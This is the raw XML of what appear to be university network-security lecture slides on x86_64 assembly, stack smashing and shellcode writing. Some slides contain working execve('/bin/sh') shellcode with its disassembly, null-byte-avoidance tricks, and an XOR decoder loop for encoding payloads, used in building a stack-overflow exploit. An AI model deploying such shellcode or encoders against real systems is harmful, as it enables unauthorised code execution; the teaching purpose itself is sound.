        <p:spPr>
          <a:xfrm>
            <a:off x="502617" y="1532073"/>
            <a:ext cx="5259985" cy="47187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 err="1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launch_shell</a:t>
            </a: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0xf0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+0x28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0x68732f2f6e69622f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+0x20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+0x20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+0x10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+0x18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+0x08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+0x10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+0x08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al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59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syscall</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E34FF"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Shape 512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6455760" y="1344057"/>
            <a:ext cx="5401162" cy="4906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&gt;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ndisasm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-b 64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payload.bin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00000000  4883ECF0          sub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rsp,byte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-0x10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00000004  4831C9           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rcx,rcx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00000007  4889CA           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rdx,rcx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0000000A  4889542428       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[rsp+0x28],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0000000F  48BA2F62696E2F2F  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rdx,0x68732f2f6e69622f7368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00000019  4889542420       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[rsp+0x20],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0000001E  488D7C2420        lea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,[rsp+0x20]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00000023  48897C2410       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[rsp+0x10],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00000028  48894C2418       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[rsp+0x18],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0000002D  48894C2408       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[rsp+0x8],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00000032  488D742410        lea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,[rsp+0x10]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00000037  488D542408        lea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,[rsp+0x8]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0000003C  4889C8           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rax,rcx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0000003F  B03B             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al,0x3b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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00000041  0F05              </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="160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syscall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317387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Shellcode Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Shape 5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We're now zero-clean, and this will work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We zero rcx immediately using the xor trick and use it to place zeroes where necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We avoid zero-padded constants by using smaller-width instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We also saved two bytes (now at 67)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Let's see one more useful trick</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270270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/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="68390"/>
            <a:ext cx="10515600" cy="9307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 err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t> (Take 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Shape 519"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1132403"/>
            <a:ext cx="10515600" cy="5044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Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>BITS 64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 err="1" smtClean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launch_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0x78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rel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pad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cl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rel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path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+0x10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+0x18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+0x08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+0x10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lea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[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+0x08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</a:t>
            </a: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al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20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59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syscall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path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db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'/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"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</a:t>
            </a:r>
            <a:endParaRPr sz="20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86097">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="214305" algn="l"/>
                <a:tab pos="437539" algn="l"/>
                <a:tab pos="660773" algn="l"/>
                <a:tab pos="884008" algn="l"/>
                <a:tab pos="1107242" algn="l"/>
                <a:tab pos="1330476" algn="l"/>
                <a:tab pos="1553710" algn="l"/>
                <a:tab pos="1776945" algn="l"/>
                <a:tab pos="2000179" algn="l"/>
                <a:tab pos="2223413" algn="l"/>
                <a:tab pos="2446647" algn="l"/>
                <a:tab pos="2669882" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="20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pad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db</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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0x0a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263969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Shellcode Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="525" name="Shape 5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295740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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7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jmp</a:t>
            </a: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7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.str</a:t>
            </a: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207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jump to our string</a:t>
            </a:r>
            <a:endParaRPr sz="207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95740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="207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.str_ret:</a:t>
            </a:r>
            <a:endParaRPr sz="207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95740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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7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7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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="207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pop addr into eax</a:t>
            </a:r>
            <a:endParaRPr sz="207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95740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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7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...</a:t>
            </a:r>
            <a:endParaRPr sz="207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95740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="207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.str:</a:t>
            </a:r>
            <a:endParaRPr sz="207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95740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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7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7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.str_ret</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="207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return to payload</a:t>
            </a:r>
            <a:endParaRPr sz="207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295740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pP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70" b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db</a:t>
            </a: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07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'/bin/sh'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="207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07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our string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="295740">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="223234" algn="l"/>
                <a:tab pos="455398" algn="l"/>
                <a:tab pos="687561" algn="l"/>
                <a:tab pos="919725" algn="l"/>
                <a:tab pos="1142959" algn="l"/>
                <a:tab pos="1375123" algn="l"/>
                <a:tab pos="1607287" algn="l"/>
                <a:tab pos="1839450" algn="l"/>
                <a:tab pos="2062684" algn="l"/>
                <a:tab pos="2294848" algn="l"/>
                <a:tab pos="2527012" algn="l"/>
                <a:tab pos="2759175" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2070">
              <a:solidFill>
                <a:srgbClr val="77A09F"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287526" indent="-287526" defTabSz="377890">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2070"/>
              <a:t>We referenced position-independent data using RIP-relative addressing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="575051" lvl="1" indent="-287526" defTabSz="377890">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2070"/>
              <a:t>New addition to x86_64 ISA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="575051" lvl="1" indent="-287526" defTabSz="377890">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2070"/>
              <a:t>(But, now we're not zero-clean...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="575051" lvl="1" indent="-287526" defTabSz="377890">
              <a:spcBef>
                <a:spcPts val="1547"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2070"/>
              <a:t>(A different trick is used on x86, above)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159023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Decoder Loops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="529" name="Shape 5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Our nice relative addressing re-introduced zeroes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>In general, modifying payloads to bypass all transformations doesn't scale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Payload might need to be zero-clean, alphanumeric, double-encoded, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Fortunately, there's a general solution to this problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>We will introduce a small decoding loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Only the loop has to be adjusted, not the entire payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307618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Decoder Loops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53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40604" y="1774183"/>
            <a:ext cx="6510793" cy="40464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964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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="50231"/>
            <a:ext cx="10515600" cy="76122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 dirty="0"/>
              <a:t>Simple Decoder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Shape 539"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1120291"/>
            <a:ext cx="10515600" cy="50566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Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>BITS 64</a:t>
            </a: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 smtClean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%</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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define </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1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payload_len</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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 (60 / 8) + 1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payload length / 8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C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>%define key 0xffffffffffffffff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expanded key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_start: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zero </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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zero </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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cl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byte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payload_len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set decode length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key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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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, key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jmp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get_payload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get payload </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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addr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00" dirty="0" err="1" smtClean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payload_ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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pop </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="16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addr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00" dirty="0" smtClean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decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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1600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6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*8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load current qword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rsi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decode it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rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1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60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*8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rdx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store decoded qword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inc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 err="1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increment index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loop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.decode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loop while </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1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rcx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 &gt; 0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jmp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.payload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execute the payload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00" dirty="0" err="1" smtClean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get_payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean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00" dirty="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0" err="1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payload_ret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.payload:</a:t>
            </a:r>
            <a:endParaRPr sz="160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199303">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="151799" algn="l"/>
                <a:tab pos="303599" algn="l"/>
                <a:tab pos="464327" algn="l"/>
                <a:tab pos="616127" algn="l"/>
                <a:tab pos="767926" algn="l"/>
                <a:tab pos="928654" algn="l"/>
                <a:tab pos="1080454" algn="l"/>
                <a:tab pos="1232253" algn="l"/>
                <a:tab pos="1392982" algn="l"/>
                <a:tab pos="1544781" algn="l"/>
                <a:tab pos="1696580" algn="l"/>
                <a:tab pos="1857309" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="160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00" dirty="0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payload goes here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54542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Encoded Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Shape 5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6861" indent="-396861">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0" smtClean="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>–call trick to get the payload address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 dirty="0"/>
              <a:t>Loops over encoded payload, decodes qword chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>A simple brute-force search will provide you a suitable key most of the time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Decoders can be much more complex, of course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Added complexity not worth it here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>But, decoders are highly useful in general</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424753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Locating the Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Shape 5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Enough shellcode tricks for now, let's finish the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Where will we put the (possibly encoded) payload?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Since the stack is executable here, let's put it there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>What's actually on the stack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215239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8818</TotalTime>
  <Words>11032</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>2075</Paragraphs>
  <Slides>189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189</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="196" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Helvetica Light</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>CS 4740/6740 Network Security</vt:lpstr>
      <vt:lpstr>Assembly Review</vt:lpstr>
      <vt:lpstr>Assembly Review</vt:lpstr>
      <vt:lpstr>A Deep Topic</vt:lpstr>
      <vt:lpstr>Compilers</vt:lpstr>
      <vt:lpstr>Assembly Language</vt:lpstr>
      <vt:lpstr>Compilation</vt:lpstr>
      <vt:lpstr>CPU and Memory</vt:lpstr>
      <vt:lpstr>CPU and Memory</vt:lpstr>
      <vt:lpstr>x86 Registers (32 bit)</vt:lpstr>
      <vt:lpstr>Register Layout</vt:lpstr>
      <vt:lpstr>Condition Codes (Flags Register)</vt:lpstr>
      <vt:lpstr>Instruction Formats</vt:lpstr>
      <vt:lpstr>Operand Types</vt:lpstr>
      <vt:lpstr>Memory References</vt:lpstr>
      <vt:lpstr>Memory References</vt:lpstr>
      <vt:lpstr>Instruction Classes</vt:lpstr>
      <vt:lpstr>Loads, Stores</vt:lpstr>
      <vt:lpstr>Endian-ness</vt:lpstr>
      <vt:lpstr>Types?</vt:lpstr>
      <vt:lpstr>Arithmetic</vt:lpstr>
      <vt:lpstr>Logic</vt:lpstr>
      <vt:lpstr>Comparison</vt:lpstr>
      <vt:lpstr>Control Transfers</vt:lpstr>
      <vt:lpstr>Control Transfers (Jumps)</vt:lpstr>
      <vt:lpstr>Procedures</vt:lpstr>
      <vt:lpstr>Control Transfers (Calls)</vt:lpstr>
      <vt:lpstr>Memory Layout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Stack Frames</vt:lpstr>
      <vt:lpstr>Calling Conventions</vt:lpstr>
      <vt:lpstr>Calling Conventions</vt:lpstr>
      <vt:lpstr>Calling Conventions</vt:lpstr>
      <vt:lpstr>SysV AMD64 ABI</vt:lpstr>
      <vt:lpstr>SysV AMD64 ABI Example</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>System Call Example</vt:lpstr>
      <vt:lpstr>Writing in Assembly</vt:lpstr>
      <vt:lpstr>/bin/true</vt:lpstr>
      <vt:lpstr>Assembling, Linking</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>objdump</vt:lpstr>
      <vt:lpstr>objdump</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>System Calls</vt:lpstr>
      <vt:lpstr>System Call Example</vt:lpstr>
      <vt:lpstr>Invoking Syscalls</vt:lpstr>
      <vt:lpstr>Invoking Syscalls</vt:lpstr>
      <vt:lpstr>Invoking Syscalls</vt:lpstr>
      <vt:lpstr>Debugging</vt:lpstr>
      <vt:lpstr>Initializing gdb</vt:lpstr>
      <vt:lpstr>Starting gdb</vt:lpstr>
      <vt:lpstr>Running the program</vt:lpstr>
      <vt:lpstr>Single-Stepping</vt:lpstr>
      <vt:lpstr>Inspecting State</vt:lpstr>
      <vt:lpstr>Stack Inspection</vt:lpstr>
      <vt:lpstr>Dumping CPU</vt:lpstr>
      <vt:lpstr>Continuing Execution</vt:lpstr>
      <vt:lpstr>gdb Cheatsheet</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Stack-based Overflows</vt:lpstr>
      <vt:lpstr>Stack-based Overflows</vt:lpstr>
      <vt:lpstr>Vulnerable Program</vt:lpstr>
      <vt:lpstr>Vulnerable Program</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>Smashing the Stack</vt:lpstr>
      <vt:lpstr>User Data Overwrites</vt:lpstr>
      <vt:lpstr>Frame Pointer Overwrites</vt:lpstr>
      <vt:lpstr>Frame Pointer Overwrites</vt:lpstr>
      <vt:lpstr>Payloads</vt:lpstr>
      <vt:lpstr>Writing Payloads</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode (Take 1)</vt:lpstr>
      <vt:lpstr>Shellcode Analysis</vt:lpstr>
      <vt:lpstr>Shellcode (Take 2)</vt:lpstr>
      <vt:lpstr>Zero-Clean Shellcode</vt:lpstr>
      <vt:lpstr>Shellcode (Take 3)</vt:lpstr>
      <vt:lpstr>Shellcode Analysis</vt:lpstr>
      <vt:lpstr>Shellcode (Take 4)</vt:lpstr>
      <vt:lpstr>Shellcode Analysis</vt:lpstr>
      <vt:lpstr>Decoder Loops</vt:lpstr>
      <vt:lpstr>Decoder Loops</vt:lpstr>
      <vt:lpstr>Simple Decoder</vt:lpstr>
      <vt:lpstr>Encoded Payload</vt:lpstr>
      <vt:lpstr>Locating the Shellcode</vt:lpstr>
      <vt:lpstr>Stack Layout</vt:lpstr>
      <vt:lpstr>Locating the Shellcode</vt:lpstr>
      <vt:lpstr>Locating the Shellcode</vt:lpstr>
      <vt:lpstr>Locating the Saved IP</vt:lpstr>
      <vt:lpstr>Locating the Shellcode</vt:lpstr>
      <vt:lpstr>Constructing an Exploit</vt:lpstr>
      <vt:lpstr>NOP Sleds</vt:lpstr>
      <vt:lpstr>Constructing an Exploit</vt:lpstr>
      <vt:lpstr>Finally</vt:lpstr>
      <vt:lpstr>Smashing the Heap</vt:lpstr>
      <vt:lpstr>Heap-based Overflows</vt:lpstr>
      <vt:lpstr>Heaps</vt:lpstr>
      <vt:lpstr>Heaps</vt:lpstr>
      <vt:lpstr>ptmalloc</vt:lpstr>
      <vt:lpstr>Heap-based Overflows</vt:lpstr>
      <vt:lpstr>Heap Layout</vt:lpstr>
      <vt:lpstr>Control Blocks</vt:lpstr>
      <vt:lpstr>Control Blocks</vt:lpstr>
      <vt:lpstr>Control Blocks</vt:lpstr>
      <vt:lpstr>Control Blocks</vt:lpstr>
      <vt:lpstr>Allocated Chunk</vt:lpstr>
      <vt:lpstr>Free Chunk</vt:lpstr>
      <vt:lpstr>Contiguous Chunks</vt:lpstr>
      <vt:lpstr>Memory Allocation</vt:lpstr>
